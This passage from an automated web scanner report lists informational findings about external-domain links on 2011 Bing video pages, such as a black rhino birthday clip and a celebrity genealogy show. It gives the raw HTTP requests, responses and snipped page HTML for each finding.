not&#32;before&#32;he&#32;faces&#32;down&#32;Jenni&#32;and&#32;DeAnna.&#32;&#34;The&#32;Bachelor&#34;&#32;returns&#32;Monday,&#32;Jan.&#32;3,&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93460806-1390-4bcc-b73e-707aa1ec15b2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.402. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 107914
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:16:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.547 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:54 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=FE632F9AB87C4452AFEDD763816ED419; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5525b056b9174877ae080754e0e2103b; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo" /><link rel="image_src" href="http://img3.catalog.video.redacted/Image.aspx?uuid=a1c85bf4-4933-4977-a9ba-a03f18dfb550&amp;w=400&amp;h=300&amp;so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fblack-rhino-celebrates-40th-birthday%2fufh7y1eo%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.u-zoo.com&#47;" data-instName="InfoRelatedLinks">U-Zoo</a>
...[SNIP]...
ionThumb playerUrl"
title="Rukwa&#32;the&#32;black&#32;rhino&#32;celebrates&#32;a&#32;special&#32;birthday&#32;at&#32;Great&#32;Britain&#39;s&#32;Port&#32;Lympne&#32;Wild&#32;Animal&#32;Park." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a1c85bf4-4933-4977-a9ba-a03f18dfb550&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ww.bing.com/videos/watch/video/cute-baby-rhino/uf5nsju1?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="A&#32;newborn&#32;rhino&#32;steals&#32;some&#32;hearts&#32;at&#32;Berlin&#32;Zoo." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;15119991-e508-4792-9faa-d19a9bc937cd&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Hero,&#32;the&#32;2-year-old&#32;white&#32;rhino,&#32;makes&#32;himself&#32;at&#32;home&#32;with&#32;the&#32;Villa&#32;family&#32;in&#32;South&#32;Africa." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;5500405e-9443-46d7-af2a-24cfe03815bb&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
f66nvuu?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="This&#32;baby&#32;rhino&#32;was&#32;the&#32;first&#32;in&#32;the&#32;world&#32;ever&#32;to&#32;be&#32;conceived&#32;artificially." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;75036051-5bab-4202-86d7-0c93634bf6f5&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
dern-suvs/ufa8j1mi?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="Here&#32;is&#32;a&#32;futuristic&#32;prototype&#32;vehicle&#32;from&#32;the&#32;&#39;50s&#32;called&#32;the&#32;Rhino." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;2fb3516f-54b9-4bd5-a491-8bff7f44dcad&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ght/pexxh15?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="Things&#32;look&#32;bad&#32;for&#32;the&#32;mom&#32;until&#32;the&#32;brave&#32;baby&#32;races&#32;to&#32;her&#32;rescue&#33;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9511ec33-7dd6-4738-b963-6a609f7c812c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
/uf3fwjbd?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="Strange&#32;tale&#32;of&#32;a&#32;goat&#32;and&#32;a&#32;rhino&#32;who&#39;ve&#32;inexplicably&#32;become&#32;best&#32;friends." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;743fcf16-7af5-4498-af29-5a1112bc5539&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
2;Conservation&#32;efforts&#32;have&#32;helped&#32;the&#32;white&#32;rhinos&#32;come&#32;back&#32;from&#32;near&#32;extinction.&#32;MSNBC.com&#39;s&#32;Dara&#32;Brown&#32;has&#32;the&#32;story." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;b5ec71d6-75d7-4788-8e82-a5acf8d2941c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
#58;&#32;The&#32;endangered&#32;and&#32;elusive&#32;Sumatran&#32;rhino&#32;is&#32;seen&#32;on&#32;video&#32;in&#32;the&#32;wild,&#32;slowly&#32;sniffing&#32;its&#32;way&#32;to&#32;a&#32;camera." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e1cc06d0-c9d9-439f-9ee8-1ba3b74dddaf&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;watched&#32;live&#32;on&#32;the&#32;Internet,&#32;has&#32;stepped&#32;out&#32;into&#32;the&#32;sunshine&#32;-&#32;and&#32;the&#32;limelight&#32;-&#32;at&#32;Britain&#39;s&#32;Paignton&#32;Zoo." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;b6b7d4e8-0dc4-4068-8c36-e36f3ee300d0&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.403. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 105273
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:15:33 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:33 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=2A046439AE0C4BEAB039A3EF561EA0B8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf0337bd634414bfa98e57cfaca8fdb9c; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2femotional-and-surprising-journeys%2f17wgxnwyo%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;who-do-you-think-you-are" data-instName="InfoRelatedLinks">Hulu - Who Do You Think You Are?</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117330" data-instName="InfoRelatedLinks">Hulu Watch Page - Emotional and Surprising Journeys</a>
...[SNIP]...
s="motionThumb playerUrl"
title="Eight&#32;of&#32;our&#32;most&#32;favorite&#32;celebrities&#32;travel&#32;the&#32;globe&#32;to&#32;unlock&#32;the&#32;mysteries&#32;of&#32;their&#32;heritage." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;c54b46a6-0935-40a0-b5bc-d168ded2e84c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
%20are&rel=MSN" class="motionThumb playerUrl"
title="The&#32;amazing&#32;journies&#32;of&#32;celebrities&#39;&#32;pasts&#32;is&#32;back&#32;for&#32;season&#32;two&#32;on&#32;February&#32;4th." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;28b30d21-82db-4788-9b33-1a1558ad6b5b&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
Url"
title="Discover&#32;the&#32;singing&#32;star&#39;s&#32;connection&#32;to&#32;George&#32;Washington&#32;on&#32;this&#32;season&#32;of&#32;Who&#32;Do&#32;You&#32;Think&#32;You&#32;Are&#63;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Vanessa&#32;makes&#32;a&#32;fascinating&#32;discovery&#32;about&#32;her&#32;great&#32;great&#32;grandfather." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
0think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Eight&#32;of&#32;today&#39;s&#32;hottest&#32;celebrities&#32;learn&#32;how&#32;history&#32;has&#32;shaped&#32;their&#32;lives." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;53511df1-cab0-4899-b3ac-57fd23e16f42&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
humb playerUrl"
title="Vanessa&#39;s&#32;journey&#32;into&#32;her&#32;family&#39;s&#32;past&#32;being&#32;with&#32;a&#32;visit&#32;to&#32;her&#32;father&#39;s&#32;final&#32;resting&#32;place." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
km4?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="A&#32;look&#32;at&#32;singing&#32;star&#32;Tim&#32;McGraw&#39;s&#32;incredible&#32;upcoming&#32;journey." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;a4423ac0-090e-40c9-8a6a-3ec31bb067a7&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
" class="motionThumb playerUrl"
title="Vanessa&#32;Williams&#32;makes&#32;more&#32;than&#32;one&#32;rare&#32;discovery&#32;at&#32;the&#32;National&#32;Archives&#32;in&#32;Washington,&#32;D.C." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img3.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;1f9e42d4-9168-44cd-be7a-a673ec791b6a&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
lass="motionThumb playerUrl"
title="Get&#32;to&#32;know&#32;Vanessa&#32;as&#32;she&#39;s&#32;about&#32;to&#32;embark&#32;on&#32;the&#32;journey&#32;of&#32;not&#32;just&#32;one&#32;lifetime..." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;374bde5b-6704-4192-a1f6-9146f8d2ebd2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
x&#32;celebrities&#32;on&#32;a&#32;journey&#32;to&#32;discover&#32;their&#32;roots&#32;in&#32;the&#32;NBC&#32;reality&#32;series,&#32;&#34;Who&#32;Do&#32;You&#32;Think&#32;You&#32;Are&#63;&#34;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9bc269b0-2581-11df-a9a6-5a3963a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

